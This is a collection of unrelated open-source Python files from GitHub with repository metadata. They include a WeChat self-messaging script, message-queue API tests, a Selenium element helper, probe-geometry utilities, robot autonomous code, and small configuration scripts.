INTERACT_URL = INTERACT_URL[:INTERACT_URL.rfind('/')]
get_login_info(r.text)
return True
elif data.group(1) == '201':
one_line_print('Please press confirm')
elif data.group(1) == '408':
one_line_print('Please reload QR Code')
return False
def get_login_info(s):
global baseRequest
for node in xml.dom.minidom.parseString(s).documentElement.childNodes:
if node.nodeName == 'skey':
baseRequest['Skey'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'wxsid':
baseRequest['Sid'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'wxuin':
baseRequest['Uin'] = node.childNodes[0].data.encode('utf8')
elif node.nodeName == 'pass_ticket':
baseRequest['DeviceID'] = node.childNodes[0].data.encode('utf8')
def web_init():
url = '%s/webwxinit?r=%s' % (INTERACT_URL, int(time.time()))
payloads = {
'BaseRequest': baseRequest,
}
headers = { 'ContentType': 'application/json; charset=UTF-8' }
r = session.post(url, data = json.dumps(payloads), headers = headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
return dic['User']['UserName']
def send_msg(toUserName = None, msg = 'Test Message'):
url = '%s/webwxsendmsg'%INTERACT_URL
payloads = {
'BaseRequest': baseRequest,
'Msg': {
'Type': 1,
'Content': msg.encode('utf8') if isinstance(msg, unicode) else msg,
'FromUserName': myUserName.encode('utf8'),
'ToUserName': (toUserName if toUserName else myUserName).encode('utf8'),
'LocalID': int(time.time()),
'ClientMsgId': int(time.time()),
},
}
headers = { 'ContentType': 'application/json; charset=UTF-8' }
session.post(url, data = json.dumps(payloads, ensure_ascii = False), headers = headers)
if __name__ == '__main__':
while uuid is None: uuid = get_QRuuid()
get_QR()
print 'QR is shown'
while not check_login(uuid): pass
myUserName = web_init()
print 'Login successfully you can send messages now, input q to exit'
msg = None
while msg != 'q':
if msg: send_msg(myUserName, msg)
msg = raw_input('>').decode(sys.stdin.encoding)
print 'Have fun:)'
|
{
"content_hash": "763102ffb5ee11f1e87f95e0e681b5bd",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 91,
"avg_line_length": 35.93693693693694,
"alnum_prop": 0.5695663073451993,
"repo_name": "littlecodersh/EasierLife",
"id": "af4c2b2a83026705267e9fd2eb08acf8856b8601",
"size": "4003",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Scripts/SendToMyself.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "105731"
}
],
"symlink_target": ""
}
|
from amqpstorm.management import ApiError
from amqpstorm.management import ManagementApi
from amqpstorm.tests import HTTP_URL
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import USERNAME
from amqpstorm.tests.utility import TestFunctionalFramework
from amqpstorm.tests.utility import setup
class ApiExchangeFunctionalTests(TestFunctionalFramework):
def test_api_exchange_get(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
self.assertIsInstance(api.exchange.get('amq.direct'), dict)
def test_api_exchange_list(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
exchanges = api.exchange.list()
self.assertIsInstance(exchanges, list)
self.assertGreater(len(exchanges), 0)
for exchange in exchanges:
self.assertIsInstance(exchange, dict)
self.assertIn('name', exchange)
self.assertIn('type', exchange)
self.assertIn('auto_delete', exchange)
def test_api_exchange_list_all(self):
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
exchanges = api.exchange.list(show_all=True)
self.assertIsInstance(exchanges, list)
self.assertGreater(len(exchanges), 0)
for exchange in exchanges:
self.assertIsInstance(exchange, dict)
self.assertIn('name', exchange)
self.assertIn('type', exchange)
self.assertIn('auto_delete', exchange)
@setup(new_connection=False, exchange=True)
def test_api_exchange_declare(self):
exchange_type = 'direct'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
self.assertIsNone(api.exchange.declare(self.exchange_name,
exchange_type,
passive=False,
durable=True))
result = api.exchange.get(self.exchange_name)
self.assertIsInstance(result, dict)
self.assertEqual(result['name'], self.exchange_name)
self.assertEqual(result['type'], exchange_type)
self.assertEqual(result['auto_delete'], False)
self.assertEqual(result['durable'], True)
def test_api_exchange_declare_passive(self):
exchange = 'test_queue_declare_passive'
expected_error_message = (
'NOT-FOUND - The client attempted to work '
'with a server entity that does not exist.'
)
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
try:
api.exchange.declare(exchange, passive=True)
except ApiError as why:
self.assertEqual(str(why), expected_error_message)
self.assertEqual(why.error_type, 'NOT-FOUND')
self.assertEqual(why.error_code, 404)
def test_api_exchange_declare_passive_exists(self):
exchange = 'test_queue_declare_passive_exists'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
api.exchange.declare(exchange)
self.assertIsNotNone(api.exchange.declare(exchange, passive=True))
@setup(new_connection=False, exchange=True)
def test_api_exchange_delete(self):
exchange_type = 'direct'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
api.exchange.declare(self.exchange_name,
exchange_type,
passive=False,
durable=True)
self.assertIsNone(api.exchange.delete(self.exchange_name))
self.assertRaisesRegexp(
ApiError,
'NOT-FOUND - The client attempted to work '
'with a server entity that does not exist.',
api.exchange.get, self.exchange_name
)
def test_api_exchange_bind_and_unbind(self):
source_name = 'amq.match'
destination_name = 'amq.direct'
routing_key = 'travis-ci'
api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
bindings = len(api.exchange.bindings(source_name))
self.assertIsNone(api.exchange.bind(source=source_name,
destination=destination_name,
routing_key=routing_key,
arguments=None))
self.assertEqual(len(api.exchange.bindings(source_name)),
bindings + 1)
self.assertIsNone(api.exchange.unbind(source=source_name,
destination=destination_name,
routing_key=routing_key))
self.assertEqual(len(api.exchange.bindings(source_name)), bindings)
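# Minimal usage sketch (added for illustration): the same ManagementApi calls
# exercised by the tests above, outside the test framework. The exchange name
# is hypothetical; HTTP_URL, USERNAME and PASSWORD come from amqpstorm.tests.
if __name__ == '__main__':
    api = ManagementApi(HTTP_URL, USERNAME, PASSWORD)
    api.exchange.declare('example.exchange', 'direct', durable=True)
    print(api.exchange.get('example.exchange'))
    api.exchange.delete('example.exchange')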
|
{
"content_hash": "9a6b7484c901ea69dec1634d82d6e600",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 75,
"avg_line_length": 37.22222222222222,
"alnum_prop": 0.6042643923240938,
"repo_name": "eandersson/amqp-storm",
"id": "ad5a802709c31d712a9b0fa14eb6dd084cb9d14f",
"size": "4690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "amqpstorm/tests/functional/management/exchange_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "159150"
}
],
"symlink_target": ""
}
|
"""sda.element
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
from __future__ import unicode_literals
import keyword
from six import string_types
from lxml.cssselect import CSSSelector, SelectorError
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import InvalidSelectorException, TimeoutException, NoSuchElementException
__all__ = ['Element', 'normalize', 'join']
DEFAULT_NAME_ATTR = 'data-qa-id'
DEFAULT_TYPE_ATTR = 'data-qa-model'
def normalize(_by, path, *args, **kwargs):
"""Convert all paths into a xpath selector
:param str _by: Selenium selector
:param str path: Selector value
:param args:
:param kwargs:
:return:
"""
if args or kwargs:
pass
xpath = '/descendant-or-self::*[{}]'
normalizers = dict([
('class name', lambda x: xpath.format('contains(@class, "%s")' % x)),
('id', lambda x: xpath.format('@id="%s"' % x)),
('link text', lambda x: xpath.format('contains("input a button", name()) and '
'normalize-space(text()) = "%s"' % x)),
('name', lambda x: xpath.format('@name="%s"' % x)),
('partial link text', lambda x: xpath.format('contains("input a button", name()) and '
'contains(normalize-space(text()), "%s")' % x)),
('tag name', lambda x: '/descendant-or-self::%s' % x),
('xpath', lambda x: x)
])
if _by == 'css selector':
try:
return By.XPATH, '/%s' % CSSSelector(str(path)).path
except SelectorError:
return By.XPATH, ''
elif _by == 'element':
if isinstance(path, Element):
return path.search_term
else:
return By.XPATH, normalizers.get(_by, lambda x: '')(str(path))
def join(*args):
"""Join 'x' locator paths into a single path
:param args: Locator path tuples (by, path)
:return: Locator path
:rtype: str
"""
return By.XPATH, ''.join([normalize(*item)[1] for item in args if isinstance(item, (list, tuple))])
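# Example (added; the selector values are hypothetical): composing two
# locators into a single xpath search term via the normalizers above.
#
#   join(('id', 'content'), ('class name', 'button'))
#   -> ('xpath', '/descendant-or-self::*[@id="content"]'
#                '/descendant-or-self::*[contains(@class, "button")]')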
class SeleniumObject(object):
"""The SeleniumObject implementation
"""
def __init__(self, web_driver, **kwargs):
self.driver = web_driver if isinstance(web_driver, WebDriver) else None
if not self.driver:
raise TypeError("'web_driver' MUST be a selenium WebDriver element")
if 'name_attr' in kwargs:
self._name_attr = kwargs['name_attr'] \
if isinstance(kwargs['name_attr'], string_types) else DEFAULT_NAME_ATTR
else:
self._name_attr = DEFAULT_NAME_ATTR
if 'type_attr' in kwargs:
self._type_attr = kwargs['type_attr'] \
if isinstance(kwargs['type_attr'], string_types) else DEFAULT_TYPE_ATTR
else:
self._type_attr = DEFAULT_TYPE_ATTR
def _wait_until(self, expected_condition, _by, path, timeout=30):
"""Wait until expected condition is fulfilled
:param func expected_condition: Selenium expected condition
:param str _by: Selector method
:param str path: Selector path
:param timeout: Wait timeout in seconds
:return:
:rtype: bool
"""
wait = WebDriverWait(self.driver, timeout) if isinstance(timeout, int) else WebDriverWait(self.driver, 30)
try:
if _by != 'element':
wait.until(expected_condition((_by, path)))
return True
except TimeoutException:
pass
return False
def wait_until_present(self, _by, path, timeout=30):
"""Wait until the element is available to the DOM
:param str _by: Selector method
:param str path: Selector path
:param timeout: Wait timeout in seconds
:return:
:rtype: bool
"""
return self._wait_until(ec.presence_of_element_located, _by, path, timeout)
def wait_until_appears(self, _by, path, timeout=30):
"""Wait until the element appears
:param str _by: Selector method
:param str path: Selector path
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.visibility_of_element_located, _by, path, timeout)
def wait_until_disappears(self, _by, path, timeout=30):
"""Wait until the element disappears
:param str _by: Selector method
:param str path: Selector path
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.invisibility_of_element_located, _by, path, timeout)
def wait_implicitly(self, seconds):
"""Wait a set amount of time in seconds
:param int seconds: Seconds to wait
:return:
:rtype: bool
"""
if isinstance(seconds, int):
self.driver.implicitly_wait(seconds)
return True
return False
class Element(object):
"""The Element implementation
An abstract class for interacting with web elements. Example use below:
Example file structure:
my_project
- __init__.py
- main.py
- my_web_page
- __init__.py
- fixtures.py
- locators.py
- page.py
The following example demonstrates a user creating a custom fixture (SomeElement) for an element on their web page,
using a locator class to store the selenium selector, and implementing a web page view to interact with that web page
and its elements:
fixtures.py
.. code-block:: python
from selenium_data_attributes.element import Element
from selenium_data_attributes.mixins import ClickMixin
class SomeElement(Element, ClickMixin):
pass
locators.py
.. code-block:: python
from selenium_data_attributes.locators import Locators
from selenium.webdriver.common.by import By
class MyWebLocators(Locators):
EXAMPLE_BUTTON = (By.XPATH, '//some//path[@id="id_example"]')
page.py
.. code-block:: python
from selenium_data_attributes.page import Page
from my_project.my_web_page.fixtures import SomeElement
from my_project.my_web_page.locators import MyWebLocators
class MyWebPage(Page):
def __init__(self, web_driver):
self.driver = web_driver
self.example_button = SomeElement(driver, *MyWebLocators.EXAMPLE_BUTTON)
main.py
.. code-block:: python
from my_project.my_web_page.page import MyWebPage
from selenium import webdriver
# Instantiate web driver
wd = webdriver.Firefox()
web_page = MyWebPage(wd)
web_page.example_button.click()
"""
def __init__(self, web_driver, by=By.XPATH, path=None, **kwargs):
"""Basic Selenium element
:param WebDriver web_driver: Selenium web driver
:param str by: By selector
:param str path: selection value
:return:
"""
self.driver = web_driver if isinstance(web_driver, WebDriver) else None
if not self.driver:
raise TypeError("'web_driver' MUST be a selenium WebDriver element")
# Instantiate selector
self.search_term = normalize(_by=by, path=path)
# Add any additional attributes
for extra in kwargs:
self.__setattr__(extra, kwargs[extra])
def __contains__(self, attribute):
"""Returns True if element contains attribute
:param str attribute: Element attribute
:return: True, if the element contains that attribute
:rtype: bool
"""
if self.exists() and isinstance(attribute, string_types):
try:
self.driver.find_element(*join(self.search_term, ('xpath', '/self::*[boolean(@{})]'.format(attribute))))
return True
except NoSuchElementException:
pass
return False
def __getattr__(self, attribute):
"""Returns the value of an attribute
.. note:: class and for are both reserved keywords. Prepend/post-pend '_' to reference both.
:param str attribute: Element attribute
:return: Returns the string value
:rtype: str
"""
if self.exists():
replacement = '' if keyword.iskeyword(attribute.replace('_', '')) else '-'
return self.element().get_attribute(attribute.replace('_', replacement))
return ''
def __repr__(self):
"""Returns HTML representation of the element
:return: HTML representation of the element
:rtype: str
"""
return '<{} by={} path={}>'.format(self.__class__.__name__, *self.search_term)
def blur(self):
"""Simulate moving the cursor out of focus of this element.
:return:
"""
return self.driver.execute_script('arguments[0].blur();', self.element()) if self.is_displayed() else None
def css_property(self, prop):
"""Return the value of a CSS property for the element
:param str prop: CSS Property
:return: Value of a CSS property
:rtype: str
"""
return self.element().value_of_css_property(str(prop)) if self.exists() else ''
def drag(self, x_offset=0, y_offset=0):
"""Drag element x,y pixels from its center
:param int x_offset: Pixels to move element to
:param int y_offset: Pixels to move element to
:return:
"""
if self.exists() and isinstance(x_offset, int) and isinstance(y_offset, int):
action = ActionChains(self.driver)
action.click_and_hold(self.element()).move_by_offset(x_offset, y_offset).release().perform()
return True
return False
def element(self):
"""Return the selenium web element object
:return: Selenium WebElement
:rtype: WebElement
"""
# If the search term passed through was an element
if self.search_term[0] == 'element' and isinstance(self.search_term[1], WebElement):
return self.search_term[1]
# If the search term is a valid term
elif self.search_term[0] in ('class name', 'css selector', 'id', 'link text',
'name', 'partial link text', 'tag name', 'xpath'):
try:
# Locate element
element = self.driver.find_elements(*self.search_term)
return element[0] if element else None
except InvalidSelectorException:
pass
return None
def exists(self):
"""Returns True if element can be located by selenium
:return: Returns True, if the element can be located
:rtype: bool
"""
return True if self.element() else False
def focus(self):
"""Simulate element being in focus
:return:
"""
return self.driver.execute_script('arguments[0].focus();', self.element()) if self.is_displayed() else None
def html(self):
"""Returns HTML representation of the element
:return: HTML representation of the element
:rtype: str
"""
return self.outerHTML if self.exists() else ''
def is_displayed(self):
"""Return True, if the element is visible
:return: True, if element is visible
:rtype: bool
"""
return self.element().is_displayed() if self.exists() else False
def parent(self):
"""Returns the Selenium element for the current element
:return:
"""
xpath = join(self.search_term, ('xpath', '/parent::*'))
return Element(self.driver, xpath[0], xpath[1])
def scroll_to(self):
"""Scroll to the location of the element
:return:
"""
if self.exists():
element = self.element()
script = "var vHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);" \
"var eTop = arguments[0].getBoundingClientRect().top;" \
"window.scrollBy(0, eTop-(vHeight/2));"
# Scroll to Element
self.driver.execute_script(script, element)
@property
def tag_name(self):
"""Returns element tag name
:return: Element tag name
:rtype: str
"""
return self.element().tag_name if self.exists() else ''
def _wait_until(self, expected_condition, timeout=30):
"""Base function for wait functions
:param expected_condition: Expected condition, callable must return boolean
:param int timeout: Seconds before timeout
:return:
"""
wait = WebDriverWait(self.driver, timeout) if isinstance(timeout, int) else WebDriverWait(self.driver, 30)
try:
if self.search_term[0] != 'element' and callable(expected_condition):
wait.until(expected_condition(self.search_term))
return True
except TimeoutException:
return False
def wait_until_present(self, timeout=30):
"""Wait until the element is present
:param timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.presence_of_element_located, timeout)
def wait_until_appears(self, timeout=30):
"""Wait until the element appears
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.visibility_of_element_located, timeout)
def wait_until_disappears(self, timeout=30):
"""Wait until the element disappears
:param int timeout: Wait timeout in seconds
:return: True, if the wait does not timeout
:rtype: bool
"""
return self._wait_until(ec.invisibility_of_element_located, timeout)
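# Compact usage sketch (added; the URL and selector are hypothetical, see the
# fuller example in the Element class docstring above):
#
#   from selenium import webdriver
#   driver = webdriver.Firefox()
#   driver.get('http://www.example.com')
#   button = Element(driver, By.XPATH, '//button[@id="id_example"]')
#   if button.wait_until_appears(timeout=10):
#       button.scroll_to()
#       print(button.html())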
|
{
"content_hash": "2cd425b70fb721ff6217fb4ae8dbc7c2",
"timestamp": "",
"source": "github",
"line_count": 503,
"max_line_length": 120,
"avg_line_length": 28.904572564612327,
"alnum_prop": 0.5983905358002614,
"repo_name": "jlane9/selenium_data_attributes",
"id": "c5f50a130a3a6a3fed6b8fa45fe2b15bc432ed5c",
"size": "14563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sda/element.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64492"
},
{
"name": "Shell",
"bytes": "991"
}
],
"symlink_target": ""
}
|
import IECore
import Gaffer
def __scriptAdded( container, script ) :
variables = script["variables"]
if "projectName" not in variables :
projectName = variables.addMember( "project:name", IECore.StringData( "default" ), "projectName" )
projectName["name"].setFlags( Gaffer.Plug.Flags.ReadOnly, True )
if "projectRootDirectory" not in variables :
projectRoot = variables.addMember( "project:rootDirectory", IECore.StringData( "$HOME/gaffer/projects/${project:name}" ), "projectRootDirectory" )
projectRoot["name"].setFlags( Gaffer.Plug.Flags.ReadOnly, True )
__scriptAddedConnection = application.root()["scripts"].childAddedSignal().connect( __scriptAdded )
|
{
"content_hash": "01ec9549f0ddf91ac418c08a0a4f90a1",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 148,
"avg_line_length": 50.53846153846154,
"alnum_prop": 0.7503805175038052,
"repo_name": "paulondc/gaffer",
"id": "b4bb299fbb9bdb4ec3141ccc1d35a92847d81215",
"size": "2474",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "startup/gui/variables.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "15447"
},
{
"name": "C++",
"bytes": "2630344"
},
{
"name": "COBOL",
"bytes": "64449"
},
{
"name": "CSS",
"bytes": "28027"
},
{
"name": "Objective-C",
"bytes": "107529"
},
{
"name": "Python",
"bytes": "2745422"
},
{
"name": "Shell",
"bytes": "6943"
},
{
"name": "Slash",
"bytes": "32856"
}
],
"symlink_target": ""
}
|
"""Multi-electrode arrays."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os
import os.path as op
import itertools
import numpy as np
from ..utils._types import _as_array
from ..utils._misc import _read_python
#------------------------------------------------------------------------------
# PRB file utilities
#------------------------------------------------------------------------------
def _edges_to_adjacency_list(edges):
"""Convert a list of edges into an adjacency list."""
adj = {}
for i, j in edges:
if i in adj:
ni = adj[i]
else:
ni = adj[i] = set()
if j in adj:
nj = adj[j]
else:
nj = adj[j] = set()
ni.add(j)
nj.add(i)
return adj
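# Example (added; edge values are made up): a chain of three channels
# 0-1-2 yields a symmetric adjacency list.
#
#   _edges_to_adjacency_list([(0, 1), (1, 2)])
#   -> {0: {1}, 1: {0, 2}, 2: {1}}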
def _probe_positions(probe, group):
"""Return the positions of a probe channel group."""
positions = probe['channel_groups'][group]['geometry']
channels = _probe_channels(probe, group)
return np.array([positions[channel] for channel in channels])
def _probe_channels(probe, group):
"""Return the list of channels in a channel group.
The order is kept.
"""
return probe['channel_groups'][group]['channels']
def _probe_all_channels(probe):
"""Return the list of channels in the probe."""
cgs = probe['channel_groups'].values()
cg_channels = [cg['channels'] for cg in cgs]
return sorted(set(itertools.chain(*cg_channels)))
def _probe_adjacency_list(probe):
"""Return an adjacency list of a whole probe."""
cgs = probe['channel_groups'].values()
graphs = [cg['graph'] for cg in cgs]
edges = list(itertools.chain(*graphs))
adjacency_list = _edges_to_adjacency_list(edges)
return adjacency_list
def _channels_per_group(probe):
groups = probe['channel_groups'].keys()
return {group: probe['channel_groups'][group]['channels']
for group in groups}
def load_probe(name):
"""Load one of the built-in probes."""
if op.exists(name):
# The argument can be either a path to a PRB file.
path = name
else:
# Or the name of a built-in probe.
curdir = op.realpath(op.dirname(__file__))
path = op.join(curdir, 'probes/{}.prb'.format(name))
if not op.exists(path):
raise IOError("The probe `{}` cannot be found.".format(name))
return _read_python(path)
def list_probes():
"""Return the list of built-in probes."""
curdir = op.realpath(op.dirname(__file__))
return [op.splitext(fn)[0] for fn in os.listdir(op.join(curdir, 'probes'))
if fn.endswith('.prb')]
#------------------------------------------------------------------------------
# MEA class
#------------------------------------------------------------------------------
class MEA(object):
"""A Multi-Electrode Array.
There are two modes:
* No probe specified: one single channel group, positions and adjacency
list specified directly.
* Probe specified: one can change the current channel_group.
"""
def __init__(self,
channels=None,
positions=None,
adjacency=None,
probe=None,
):
self._probe = probe
self._channels = channels
if positions is not None:
assert self.n_channels == positions.shape[0]
self._positions = positions
# This is a mapping {channel: list of neighbors}.
if adjacency is None and probe is not None:
adjacency = _probe_adjacency_list(probe)
self.channels_per_group = _channels_per_group(probe)
self._adjacency = adjacency
def _check_positions(self, positions):
if positions is None:
return
positions = _as_array(positions)
if self.n_channels is None:
self.n_channels = positions.shape[0]
if positions.shape[0] != self.n_channels:
raise ValueError("'positions' "
"(shape {0:s})".format(str(positions.shape)) +
" and 'n_channels' "
"({0:d})".format(self.n_channels) +
" do not match.")
@property
def positions(self):
"""Channel positions in the current channel group."""
return self._positions
@positions.setter
def positions(self, value):
self._check_positions(value)
self._positions = value
@property
def channels(self):
"""Channel ids in the current channel group."""
return self._channels
@property
def n_channels(self):
"""Number of channels in the current channel group."""
return len(self._channels) if self._channels is not None else 0
@property
def adjacency(self):
"""Adjacency graph in the current channel group."""
return self._adjacency
@adjacency.setter
def adjacency(self, value):
self._adjacency = value
def change_channel_group(self, group):
"""Change the current channel group."""
assert self._probe is not None
self._channels = _probe_channels(self._probe, group)
self._positions = _probe_positions(self._probe, group)
#------------------------------------------------------------------------------
# Common probes
#------------------------------------------------------------------------------
def linear_positions(n_channels):
"""Linear channel positions along the vertical axis."""
return np.c_[np.zeros(n_channels),
np.linspace(0., 1., n_channels)]
def staggered_positions(n_channels):
"""Generate channel positions for a staggered probe."""
i = np.arange(n_channels - 1)
x, y = (-1) ** i * (5 + i), 10 * (i + 1)
pos = np.flipud(np.r_[np.zeros((1, 2)), np.c_[x, y]])
return pos
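# Minimal usage sketch (added; channel ids are hypothetical): build an MEA
# directly from positions generated by the helper above.
if __name__ == '__main__':
    mea = MEA(channels=[0, 1, 2, 3], positions=linear_positions(4))
    print(mea.n_channels)  # 4
    print(mea.positions)   # 4 x 2 array of (x, y) positions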
|
{
"content_hash": "8ef866b37753544b9a74386cfc9fcd3a",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 79,
"avg_line_length": 30.850515463917525,
"alnum_prop": 0.5279866332497911,
"repo_name": "nsteinme/phy",
"id": "714cf732275574446cfeb5bf2e3765e4ef643816",
"size": "6010",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "phy/electrode/mea.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "792"
},
{
"name": "GLSL",
"bytes": "11248"
},
{
"name": "HTML",
"bytes": "751"
},
{
"name": "Makefile",
"bytes": "965"
},
{
"name": "Python",
"bytes": "816412"
}
],
"symlink_target": ""
}
|
try:
import wpilib
except ImportError:
from pyfrc import wpilib
import timed_shoot
class HotShootAutonomous(timed_shoot.TimedShootAutonomous):
'''
Based on the TimedShootAutonomous mode. Modified to allow
shooting based on whether the hot goal is enabled or not.
'''
DEFAULT = False
MODE_NAME = "Hot Aim shoot old"
def __init__(self, components):
super().__init__(components)
wpilib.SmartDashboard.PutNumber('DriveRotateSpeedLeft', -0.5)
wpilib.SmartDashboard.PutNumber('DriveRotateSpeedRight', 0.55)
wpilib.SmartDashboard.PutNumber('DriveRotateTime', 0.1)
wpilib.SmartDashboard.PutBoolean('IsHotLeft', False)
wpilib.SmartDashboard.PutBoolean('IsHotRight', False)
def on_enable(self):
'''This function is called when autonomous mode starts'''
super().on_enable()
self.drive_rotate_speed_left = wpilib.SmartDashboard.GetNumber('DriveRotateSpeedLeft')
self.drive_rotate_speed_right = wpilib.SmartDashboard.GetNumber('DriveRotateSpeedRight')
self.drive_rotate_time = wpilib.SmartDashboard.GetNumber('DriveRotateTime')
print("-> Drive rotate spd L:", self.drive_rotate_speed_left)
print("-> Drive rotate spd R:", self.drive_rotate_speed_right)
print("-> Drive rotate tm:", self.drive_rotate_time)
self.decided = False
self.start_time = None
def on_disable(self):
'''This function is called when autonomous mode is disabled'''
pass
def update(self, time_elapsed):
'''The actual autonomous program'''
# decide if it's hot or not
if not self.decided:
self.hotLeft = wpilib.SmartDashboard.GetBoolean("IsHotLeft")
self.hotRight = wpilib.SmartDashboard.GetBoolean("IsHotRight")
if (self.hotLeft or self.hotRight) and not (self.hotLeft and self.hotRight):
self.decided = True
if self.hotLeft:
self.drive_rotate_speed = self.drive_rotate_speed_left
else:
self.drive_rotate_speed = self.drive_rotate_speed_right
elif time_elapsed > 6:
# at 6 seconds, give up and shoot anyways
self.decided = True
# default to the left
self.drive_rotate_speed = self.drive_rotate_speed_left
# always keep the arm down
self.intake.armDown()
# wait a split second for the arm to come down, then
# keep bringing the catapult down so we're ready to go
if time_elapsed > 0.3:
self.catapult.pulldown()
# wait some period before we start driving
if time_elapsed < self.drive_wait:
pass
else:
#print('oh hai')
if self.decided:
#print (time_elapsed)
# only set this once, so we can calculate time from this
# point on
if self.start_time is None:
self.start_time = time_elapsed
#print('moo')
time_elapsed = time_elapsed - self.start_time
if time_elapsed < self.drive_rotate_time:
# rotate
self.drive.move(0, 0, self.drive_rotate_speed)
elif time_elapsed < self.drive_rotate_time + self.drive_time:
# Drive slowly forward for N seconds
self.drive.move(0, self.drive_speed, 0)
elif time_elapsed < self.drive_rotate_time + self.drive_time + 1.0:
# Finally, fire and keep firing for 1 seconds
self.catapult.launchNoSensor()
|
{
"content_hash": "b870212df0077d10dc5c8cffdd2fe9ce",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 96,
"avg_line_length": 37.097345132743364,
"alnum_prop": 0.5260019083969466,
"repo_name": "frc1418/2014",
"id": "ef812c9d84c6c4e0a7d979ac6196f2c4e22a5004",
"size": "4192",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robot/robot/old_autonomous/hot_aim_shootOld.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AutoIt",
"bytes": "686"
},
{
"name": "Python",
"bytes": "307255"
}
],
"symlink_target": ""
}
|
import sys
import serial as s
import glob
conn = s.Serial(glob.glob("/dev/tty.usbmodem*")[0])
while True:
sys.stdout.write(conn.read())
|
{
"content_hash": "7876eb5396fe01a65787ef5933ee6e94",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 51,
"avg_line_length": 17.75,
"alnum_prop": 0.6971830985915493,
"repo_name": "deets/raspberry-racer",
"id": "8a25edf704dbc4b1a12b6b7c0528fa6c79b9ed59",
"size": "142",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usbkey/read.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4394808"
},
{
"name": "C++",
"bytes": "8995935"
},
{
"name": "Objective-C",
"bytes": "8074"
},
{
"name": "Python",
"bytes": "344391"
},
{
"name": "Shell",
"bytes": "1708817"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import Bird, State, Bird_type
admin.site.register(Bird)
admin.site.register(State)
admin.site.register(Bird_type)
|
{
"content_hash": "fce227fd04f8806976262f3aa79777f0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 26.833333333333332,
"alnum_prop": 0.8012422360248447,
"repo_name": "annerainywoods/birding_ear",
"id": "f73d6140a83b2ab3bd0dd3bf09db9ff4114e708a",
"size": "161",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "birding_ear/admin-working.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12430"
},
{
"name": "HTML",
"bytes": "94427"
},
{
"name": "JavaScript",
"bytes": "40225"
},
{
"name": "Python",
"bytes": "42652"
}
],
"symlink_target": ""
}
|
from ecnet import Server
from ecnet.utils.logging import logger
def main():
logger.stream_level = 'debug'
sv = Server(num_processes=4)
sv.load_data('../kv_model_v1.0_full.csv')
sv.limit_inputs(15, output_filename='../kv_model_v1.0.csv')
if __name__ == '__main__':
main()
|
{
"content_hash": "10c030d95a9d2a2cd90fa98115ecc226",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 63,
"avg_line_length": 19.8,
"alnum_prop": 0.6296296296296297,
"repo_name": "TJKessler/ECNet",
"id": "9af77def5aaaea787d91f6b6d1e9930de5c50336",
"size": "297",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/tutorials/Getting Started/scripts/limit_input_descriptors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55623"
},
{
"name": "TeX",
"bytes": "1794"
}
],
"symlink_target": ""
}
|
def need_to_debug():
# some code here
from doit import tools
tools.set_trace()
# more code
def task_X():
return {'actions':[(need_to_debug,)]}
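# Usage note (added): with this dodo.py, running `doit X` executes
# need_to_debug() and stops at tools.set_trace(); doit's own set_trace is
# used here, presumably because doit captures task output, which would
# interfere with a plain pdb.set_trace().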
|
{
"content_hash": "32a17943c34eb074643c150b20fe9af0",
"timestamp": "",
"source": "github",
